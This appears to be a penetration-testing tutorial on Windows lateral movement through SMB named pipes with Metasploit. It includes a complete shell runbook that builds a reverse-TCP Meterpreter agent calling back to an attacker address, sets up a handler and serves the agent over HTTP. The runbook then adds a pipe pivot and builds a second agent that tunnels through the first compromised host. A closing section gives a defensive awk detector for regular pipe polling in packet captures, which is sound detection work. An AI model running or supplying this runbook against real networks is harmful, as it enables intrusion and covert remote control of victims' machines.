Lateral Movement With Named Pipes

Once an initial foothold has been gained in a network, named pipes offer a stealthy method of moving laterally. A named pipe is a Windows inter-process communication mechanism: a server process creates a pipe under \\.\pipe\<name>, and client processes open it with the same file APIs they use for ordinary files, reading and writing through it as a bidirectional channel.

You can list the currently open named pipes on a host with Sysinternals PipeList (https://docs.microsoft.com/en-us/sysinternals/downloads/pipelist). The same list is available without extra tooling from PowerShell with Get-ChildItem \\.\pipe\.

PipeList v1.02 - Lists open named pipes
Copyright (C) 2005-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

[Screenshot of PipeList output: a table with the columns Pipe Name, Instances and Max Instances. The legible pipe names include InitShutdown, lsass, protected_storage, ntsvcs, scerpc, plugplay, several Winsock2\CatalogChangeListener-... pipes, epmapper, LSM_API_service, eventlog, wkssvc, keysvc, MsFteWds, VBoxTrayIPC-alice and per-process Chrome pipes (chrome.356.*); the instance counts were not legible.]

Named pipes can also be opened remotely over SMB: a client opens \\<host>\pipe\<name>, which the server exposes through its IPC$ share on TCP port 445. Because the traffic is ordinary SMB between two Windows hosts, a pipe-based channel blends in with normal file-sharing and RPC traffic, which is what makes it attractive for lateral movement (and why SMB between workstations, rather than to file servers and domain controllers, is worth alerting on).

Metasploit can use a named pipe as the transport for a Meterpreter session, so an existing session can act as a pipe server and relay control of further Meterpreter agents that connect to it. As an example of how to do this, first generate a Meterpreter agent using MSFVenom:

[Screenshot: Create an initial Meterpreter agent]

Next, start a Metasploit handler (exploit/multi/handler with the matching payload, LHOST and LPORT) to accept the connection back to the attacker's Kali system.

The generated executable can then be transferred to the first target host over HTTP and executed there.

Configuring the Pipe Listener

With the Meterpreter agent running on the first endpoint, we can configure a pipe listener inside that session; the first endpoint then acts as the pipe server. Next, generate a second Meterpreter agent that connects to that pipe on the first endpoint instead of back to Kali:

[Screenshot: Generate a named pipe Meterpreter agent]
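The whole procedure above, written out as an added sh runbook. This is not the article's own command sequence (which appeared only in screenshots): the payload names, msfvenom options and the Meterpreter pivot command are real Metasploit features, but the addresses are assumptions. ATTACKER_IP is hypothetical, while PIPE_HOST=172.16.16.19 and PIPE_NAME=bgpipe are taken from the capture further down, where 172.16.16.19:445 is the host whose pipe gets peeked. All of them can be overridden in the environment.

```shell
#!/bin/sh
# Named-pipe pivot runbook (added example, not the article's commands).
# Addresses below are assumptions; override them in the environment.
ATTACKER_IP="${ATTACKER_IP:-172.16.16.1}"   # hypothetical Kali box the first agent calls back to
LPORT="${LPORT:-4444}"
PIPE_HOST="${PIPE_HOST:-172.16.16.19}"     # first compromised endpoint: it hosts the pipe
PIPE_NAME="${PIPE_NAME:-bgpipe}"           # pipe name seen in the capture
ARCH="${ARCH:-x64}"                        # x64 or x86

# Metasploit's payload path differs between architectures.
payload_prefix() {
  if [ "$ARCH" = "x64" ]; then
    printf 'windows/x64/meterpreter'
  else
    printf 'windows/meterpreter'
  fi
}

# Step 1: initial agent, a plain reverse TCP Meterpreter back to Kali.
build_initial_agent() {
  msfvenom -p "$(payload_prefix)/reverse_tcp" "LHOST=$ATTACKER_IP" "LPORT=$LPORT" \
    -f exe -o agent.exe
}

# Step 2: the handler as a resource script, started with: msfconsole -r handler.rc
write_handler_rc() {
  cat > "$1" <<EOF
use exploit/multi/handler
set payload $(payload_prefix)/reverse_tcp
set LHOST $ATTACKER_IP
set LPORT $LPORT
set ExitOnSession false
run -j
EOF
}

# Step 3: serve agent.exe over HTTP so it can be fetched onto the first target.
serve_agent() {
  python3 -m http.server "${1:-8080}"
}

# Step 4: typed inside the first Meterpreter session. The first endpoint then
# listens on \\.\pipe\$PIPE_NAME; -l is the address other hosts reach it at.
# 'pivot list' in the same session shows the listener afterwards.
pivot_add_command() {
  printf 'pivot add -t pipe -l %s -n %s -a %s -p windows\n' \
    "$PIPE_HOST" "$PIPE_NAME" "$ARCH"
}

# Step 5: the second agent never talks to Kali, only to the pipe on PIPE_HOST.
build_pipe_agent() {
  msfvenom -p "$(payload_prefix)/reverse_named_pipe" \
    "PIPEHOST=$PIPE_HOST" "PIPENAME=$PIPE_NAME" -f exe -o pipe_agent.exe
}

# UNC path the second agent opens over SMB (the File: value Wireshark shows).
pipe_unc_path() {
  printf '\\\\%s\\pipe\\%s\n' "$PIPE_HOST" "$PIPE_NAME"
}

# Build everything only when asked; the handler and HTTP server are
# long-running, so they are started by hand in separate terminals.
if [ "${RUN_PIVOT:-0}" = "1" ]; then
  build_initial_agent
  write_handler_rc handler.rc
  build_pipe_agent
  echo "1. msfconsole -r handler.rc   (separate terminal; serve_agent in another)"
  echo "2. run agent.exe on the first endpoint, then in its Meterpreter session:"
  echo "   $(pivot_add_command)"
  echo "3. run pipe_agent.exe on the second endpoint; it opens $(pipe_unc_path)"
fi
```

Run it as RUN_PIVOT=1 sh pivot.sh on the Kali host. The pipe listener must be reachable from the second target at the address given to -l, and the second agent only ever speaks SMB to PIPE_HOST, so nothing from that host is expected to reach Kali directly.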

When the second payload executes on the target endpoint, you should see the staging and the subsequent session traffic over SMB (TCP 445): the new agent opens the pipe on the first endpoint and then polls it with FSCTL_PIPE_PEEK IOCTLs roughly twice a second, as in the capture below. The direction of the requests gives away the roles: 172.16.16.200 is the target endpoint acting as SMB client, and 172.16.16.19 is the first endpoint hosting the pipe bgpipe.

No.    Time         Source         Destination    Protocol  Length  Info
19153  1666.287797  172.16.16.200  172.16.16.19   TCP       60      49210 → 445 [ACK] Seq=5273 Ack=184754 Win=65280 Len=0
19154  1666.585161  172.16.16.200  172.16.16.19   SMB2      178     Ioctl Request FSCTL_PIPE_PEEK File: bgpipe
19155  1666.589081  172.16.16.19   172.16.16.200  SMB2      186     Ioctl Response FSCTL_PIPE_PEEK File: bgpipe
19156  1666.799320  172.16.16.200  172.16.16.19   TCP       60      49210 → 445 [ACK] Seq=5397 Ack=184886 Win=65024 Len=0
19157  1667.082598  172.16.16.200  172.16.16.19   SMB2      178     Ioctl Request FSCTL_PIPE_PEEK File: bgpipe
19158  1667.082689  172.16.16.19   172.16.16.200  SMB2      186     Ioctl Response FSCTL_PIPE_PEEK File: bgpipe
19159  1667.285383  172.16.16.200  172.16.16.19   TCP       60      49210 → 445 [ACK] Seq=5521 Ack=185018 Win=65024 Len=0
19160  1667.598736  172.16.16.200  172.16.16.19   SMB2      178     Ioctl Request FSCTL_PIPE_PEEK File: bgpipe
19161  1667.598822  172.16.16.19   172.16.16.200  SMB2      186     Ioctl Response FSCTL_PIPE_PEEK File: bgpipe
19162  1667.799801  172.16.16.200  172.16.16.19   TCP       60      49210 → 445 [ACK] Seq=5645 Ack=185150 Win=64768 Len=0
19163  1668.092511  172.16.16.200  172.16.16.19   SMB2      178     Ioctl Request FSCTL_PIPE_PEEK File: bgpipe
19164  1668.101465  172.16.16.19   172.16.16.200  SMB2      186     Ioctl Response FSCTL_PIPE_PEEK File: bgpipe

The new session, tunnelled through the first endpoint's pipe, will then appear in msfconsole alongside the original one.
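The capture above is also what a defender has to work with, so here is the detection side as an added sh/awk example (not from the article). It reads a Wireshark CSV export (File > Export Packet Dissections > As CSV, default columns No., Time, Source, Destination, Protocol, Length, Info), groups FSCTL_PIPE_PEEK requests by client, server and pipe name, and flags pipes that are not on a baseline list and are being peeked on a regular schedule, which is how the Meterpreter pipe transport looks on the wire. SAMPLE_CSV is constructed to mirror the rows above, with one benign srvsvc row added as a control; the KNOWN_PIPES baseline is an assumption to be tuned per estate.

```shell
#!/bin/sh
# Flag Meterpreter-style named-pipe polling in a Wireshark CSV export.
# Added example, not from the article. SAMPLE_CSV is constructed to mirror
# the capture in the article; the srvsvc row is a benign control.
SAMPLE_CSV='"No.","Time","Source","Destination","Protocol","Length","Info"
"19154","1666.585161","172.16.16.200","172.16.16.19","SMB2","178","Ioctl Request FSCTL_PIPE_PEEK File: bgpipe"
"19155","1666.589081","172.16.16.19","172.16.16.200","SMB2","186","Ioctl Response FSCTL_PIPE_PEEK File: bgpipe"
"19157","1667.082598","172.16.16.200","172.16.16.19","SMB2","178","Ioctl Request FSCTL_PIPE_PEEK File: bgpipe"
"19158","1667.082689","172.16.16.19","172.16.16.200","SMB2","186","Ioctl Response FSCTL_PIPE_PEEK File: bgpipe"
"19160","1667.598736","172.16.16.200","172.16.16.19","SMB2","178","Ioctl Request FSCTL_PIPE_PEEK File: bgpipe"
"19163","1668.092511","172.16.16.200","172.16.16.19","SMB2","178","Ioctl Request FSCTL_PIPE_PEEK File: bgpipe"
"19170","1668.300000","172.16.16.50","172.16.16.19","SMB2","178","Ioctl Request FSCTL_PIPE_PEEK File: srvsvc"'

# Pipes that are normal to see over SMB (standard RPC endpoints, several of
# which appear in the PipeList output). Assumption: baseline your own estate;
# anything else being peeked on a schedule is worth a look.
KNOWN_PIPES="srvsvc wkssvc samr lsarpc lsass netlogon spoolss epmapper eventlog ntsvcs scerpc atsvc winreg svcctl"

# find_suspicious_pipes <csv-text> [min_requests] [max_jitter]
# Prints "client server pipe requests mean_interval" for every (client,
# server, pipe) whose pipe is not in KNOWN_PIPES and is peeked at least
# min_requests times at a regular interval, i.e. (max gap - min gap) / mean
# gap <= max_jitter. The Meterpreter transport above polls about every 0.5 s.
find_suspicious_pipes() {
  printf '%s\n' "$1" | awk -F'","' -v known="$KNOWN_PIPES" \
      -v min_req="${2:-3}" -v max_jit="${3:-0.25}" '
    BEGIN { n = split(known, k, " "); for (i = 1; i <= n; i++) ok[k[i]] = 1 }
    $5 == "SMB2" && $7 ~ /^Ioctl Request FSCTL_PIPE_PEEK File: / {
      pipe = $7
      sub(/^Ioctl Request FSCTL_PIPE_PEEK File: /, "", pipe)
      sub(/"$/, "", pipe)                        # strip the closing CSV quote
      key = $3 " " $4 " " pipe                   # client, server, pipe
      cnt[key]++
      if (cnt[key] > 1) {                        # gap since the previous peek
        g = $2 - last[key]
        sum[key] += g
        if (cnt[key] == 2 || g > maxg[key]) maxg[key] = g
        if (cnt[key] == 2 || g < ming[key]) ming[key] = g
      }
      last[key] = $2
    }
    END {
      for (key in cnt) {
        split(key, f, " ")
        if ((tolower(f[3]) in ok) || cnt[key] < min_req || cnt[key] < 2) continue
        mean = sum[key] / (cnt[key] - 1)
        if (mean <= 0) continue
        if ((maxg[key] - ming[key]) / mean <= max_jit)
          printf "%s %s %s %d %.3f\n", f[1], f[2], f[3], cnt[key], mean
      }
    }'
}

# Stand-alone run over the constructed sample.
find_suspicious_pipes "$SAMPLE_CSV"
```

On the sample this reports the bgpipe channel from 172.16.16.200 to 172.16.16.19 with four peeks about half a second apart and stays quiet about srvsvc. On a real export, feed the output into a ticket together with the Sysmon pipe events (Pipe Created / Pipe Connected) from the server host, which name the process that created the pipe.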